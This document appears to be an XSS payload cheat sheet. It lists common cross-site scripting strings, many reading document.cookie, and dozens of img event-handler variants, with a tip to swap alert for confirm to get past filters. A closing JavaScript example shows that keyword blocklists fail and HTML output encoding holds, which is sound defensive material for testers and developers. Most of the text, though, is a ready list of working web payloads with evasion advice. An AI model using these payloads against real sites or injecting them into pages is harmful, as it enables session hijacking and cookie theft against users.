Frequently used patterns (adapt the syntax to the source code of the response)
1. <svg onmouseover="confirm(1)">
2. <SCRIPT>alert(document.cookie)</SCRIPT>
3. "><svg onload="alert(document.cookie)">.png
4. `;return false});});alert xss`;</script>
5. <img src=x onwheel="alert(document.cookie)">
6. "><script>alert(document.cookie)</script>
7. ['"><input type="text" onmouseover="confirm(document.cookie)"style="height:1000px: width:1000px" name="test[']
-> custom code, tailored to the target page
10. "svg/onload="confirm(document.cookie)"
Syntax mainly used when getting through with an event handler (if alert is blocked, get through with confirm)
<img src=x onwheel="alert(document.cookie)">
<img src=x onclick="alert(document.cookie)">
<img src=x ondblclick="alert(document.cookie)">
<img src=x ondrag="alert(document.cookie)">
<img src=x ondragend="alert(document.cookie)">
<img src=x ondragstart="alert(document.cookie)">
<img src=x ondragover="alert(document.cookie)">
<img src=x ondragdrop="alert(document.cookie)">
<img src=x onerror="alert(document.cookie)">
<img src=x onfocus="alert(document.cookie)">
<img src=x onfocusin="alert(document.cookie)">
<img src=x onfocusout="alert(document.cookie)">
<img src=x onkeydown="alert(document.cookie)">
<img src=x onkeypress="alert(document.cookie)">
<img src=x onkeyup="alert(document.cookie)">
<img src=x onload="alert(document.cookie)">
<img src=x onmousedown="alert(document.cookie)">
<img src=x onmouseenter="alert(document.cookie)">
<img src=x onmouseover="alert(document.cookie)">
<img src=x onmousemove="alert(document.cookie)">
<img src=x onmouseup="alert(document.cookie)">
<img src=x onmousewheel="alert(document.cookie)">
<img src=x onscroll="alert(document.cookie)">
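Seen from the defending side, the note above about swapping alert for confirm is why keyword blocklists fail against this list while output encoding does not. The following is an added example, not code from the original post; the filter, the `renderProfile` template and the field name `nick` are hypothetical, and the sample inputs are copied from the list above.

```javascript
// Constructed sample inputs: four payloads copied from the list above.
const SAMPLES = [
  '<svg onmouseover="confirm(1)">',
  '"><svg onload="alert(document.cookie)">.png',
  '<img src=x onwheel="alert(document.cookie)">',
  '"svg/onload="confirm(document.cookie)"',
];

// Weak control (hypothetical filter, shown for contrast): keyword blocklist.
function blocklistAllows(input) {
  return !/<script\b|alert\s*\(/i.test(input);
}

// Stronger control: encode every character that can end a text node or a
// quoted attribute value, so the input stays data whatever it spells.
const HTML_ENTITIES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;',
  '"': '&quot;', "'": '&#x27;', '`': '&#x60;',
};
function encodeHtml(value) {
  return String(value).replace(/[&<>"'`]/g, (ch) => HTML_ENTITIES[ch]);
}

// Hypothetical template placing untrusted text in both contexts.
function renderProfile(nick) {
  const safe = encodeHtml(nick);
  return `<input type="text" name="nick" value="${safe}"><p>${safe}</p>`;
}

// Count opening tags; the template itself contributes exactly two.
function countTags(html) {
  return (html.match(/<[a-zA-Z]/g) || []).length;
}

// For each sample: does the blocklist let it through, and how many tags
// exist in the rendered page once the value has been encoded?
function report() {
  return SAMPLES.map((payload) => ({
    payload,
    passesBlocklist: blocklistAllows(payload),
    tagsAfterEncoding: countTags(renderProfile(payload)),
  }));
}

console.log(report());
```

This encoding covers HTML text and quoted attribute values only; a value written inside a script block, which pattern 4 targets, needs JavaScript string encoding instead.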